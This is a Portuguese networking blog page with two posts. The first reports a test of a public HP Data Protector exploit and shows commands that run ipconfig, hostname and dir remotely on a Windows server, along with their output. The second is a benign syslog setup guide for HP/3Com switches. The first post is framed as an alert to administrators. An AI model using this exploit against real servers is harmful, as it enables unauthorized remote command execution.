Let's Kill Your Network

Redes, linux e informatica em geral

Páginas

sábado, 17 de agosto de 2013

Falha de segurança HP Data Protector

By  Nenhum comentário:
Fiz testes e uma falha de segurança do HP data protector com o exploit do link abaixo e o mesmo funcionou corretamente. Fica o alerta para os administradores, acredito que uma atualização resolva o problema, vou postar os resultados assim que nós atualizarmos o software.

Fiz os testes com um sistema linux, o servidor Data Protector está em um sistema windows.
Segue o exploit:

Testes:
[root@proxyteste ~]# python loler.py 10.1.1.1 5555 ipconfig
[*] Connecting to target '10.1.1.1:5555'...
[*] Connected to the target.
[*] Sending payload 'ipconfig'
[*] Output:
Windows IP Configuration
Ethernet adapter Local Area Connection 7:
    Connection-specific DNS Suffix  . :
    IPv4 Address. . . . . . . . . . . : 10.1.1.1
    Subnet Mask . . . . . . . . . . . : 255.255.0.0
    Default Gateway . . . . . . . . . : 10.1.1.254
....
[root@proxyteste ~]# python loler.py 10.1.1.1 5555 hostname
[*] Connecting to target '10.1.1.1:5555'...
[*] Connected to the target.
[*] Sending payload 'hostname'
[*] Output:
DPSERVER
...
[root@proxyteste ~]# python loler.py 10.1.1.1 5555 'dir c:' | less
  Volume in drive C has no label.
  Volume Serial Number is 72AF-MD27
  Directory of C:\Windows\System32
10/26/2012  07:36 AM    <DIR>          .
10/26/2012  07:36 AM    <DIR>          ..
01/19/2008  11:02 AM    <DIR>          0409
09/18/2006  06:28 PM             2,151 12520437.cpx
09/18/2006  06:28 PM             2,233 12520850.cpx
09/18/2006  06:32 PM         1,228,100 8point1.wav
04/11/2009  01:12 PM           136,192 aaclient.dll
04/11/2009  01:11 PM         2,515,968 accessibilitycpl.dll
Read More

domingo, 11 de agosto de 2013

Trabalhando com syslog em Switches HP

By  Nenhum comentário:
Essa dica é para trabalhar com logs em switches HP e 3com, redirecionado os logs para um servidor syslog.

O syslog é uma ótima forma para monitorar e descobrir problemas na rede, com ele podemos receber alertas do switch em um servidor syslog e tomar as ações necessárias em caso de problemas.

A RFC do syslog é a RFC 3164. Há vários níveis do syslog que documentam desde problemas a um simples login no equipamento.

Vamos as configurações!

No modo system inserir os seguintes comandos:

info-center enable
info-center loghost [ip do servidor syslog]
info-center source default channel 2 log level error trap state off

Explicação dos comandos.

1 - info-center enable
Habilita o info-center, feature dos Switches 3com para logs do sistema, por padrão já vem habilitado nos switchs.

2- info-center loghost [ip do servidor syslog]
Configura o servidor para envio dos logs.

3- info-center source default channel 2 log level error trap state off
Com esse cara você define o nível do log.

Existem 8 niveis de erros conforme imagem abaixo:















Nesse caso ativei o nivel "erros".
O parâmetro "trap state" define se será enviado ou não traps para o syslog server, essas são as traps SNMP, que enviam alertas como UP/DOWN de interfaces e problemas em geral. Outro parâmetro que poderia ser configurado é o "debug state" que envia informações de debug, por padrão já vem desabilitado.


A forma que os logs serão recebidos será dessa forma:

<priority>timestamp sysname module/level/digest:content

Exemplo:

<185>Aug 10 07:36:40 2013 Switch STP/2/SPEED:- 1 -Ethernet1/0/17's speed changed!

1 - Prioridade(priority): Prioridade do log, existe uma formula para o seu calculo:
facility*8+severity-1

facility, o valor padrão é 23 - O facility define o que gerou o log no sistema, em sistemas unix o valor vai de 0 a 15, do 16 ao 23 é reservado.

Severity é o nivel do log conforme a imagem acima, no nosso caso, o nível configurado foi o 3 porém essa é uma mensagem de nível critico, que seria o valor 2.

No exemplo acima, a formula ficaria assim:
23*8+2-1=185.

2 - Timestamp: O horário no qual o sistema gerou o log, esse horário é o horário que está no Switch.
3 - Sysname - Nome do switch
4 - Modulo do syslog/Nivel/alerta(resumido).
5 - O alerta em si, mostrando a mensagem do alerta.

Esse procedimento se aplica para os Conware, para Procurve muda alguns comandos, abaixo exemplo para procurve

1- logging severity warning
Define nivel dos logs

2-  logging [ip do servidor syslog]
Configura o servidor para envio dos logs.



E é isso.
Obrigado pela leitura e boa configuração a todos!

Fonte: Foram verificados os manuais dos equipamentos 3com 4210 e 5500.





Read More
  • Fortigate - Criando objetos via CLI
    Abaixo comandos básicos para criação de objetos via CLI no FG. Para acessar as configurações de objeto config firewall address Podemos d...
  • Bloqueio de SSH com envio de e-mail
    Uma boa prática de segurança é limitar acessos SSH aos servidores, há várias formas de fazer e logar  os acessos, nesse exemplo vamos utiliz...
  • RansomWare Tracker
    Eis que nasce um novo recurso para monitoramento e bloqueio de Ransomware, o RansomWareTracker. O RansomWareTracker é um projeto criado e...
  • Remover entrada em cache Windows DNS
    Essa dica é para remover uma entrada cache DNS no Windows Server, muito útil caso algum site troque o IP e você fique sem acesso pela demora...
  • Trabalhando com sFlow em Switchs Procurve
    O sFlow é uma ferramenta para coleta de fluxos de dados, esses fluxos coletados são chamados de samples e podem ser exportados para ferrame...
  • Resumo OSPF - LSAs
    Breve resumo dos principais LSAs do OSPF. - LSA tipo 1 - - Gerado por todos os roteadores e são locais (dentro da área) - O ID do pacote...
  • Trabalhando com syslog em Switches HP
    Essa dica é para trabalhar com logs em switches HP e 3com, redirecionado os logs para um servidor syslog. O syslog é uma ótima forma para ...
  • Definir saída para rota no BGP MultiHomed
    Surgiu uma necessidade para fazermos uma rota sair por outra operadora no nosso quagga porém sem usar rota estática. Há algumas formas de fa...
  • Falha de segurança HP Data Protector
    Fiz testes e uma falha de segurança do HP data protector com o exploit do link abaixo e o mesmo funcionou corretamente. Fica o alerta para ...

Marcadores

Tecnologia do Blogger.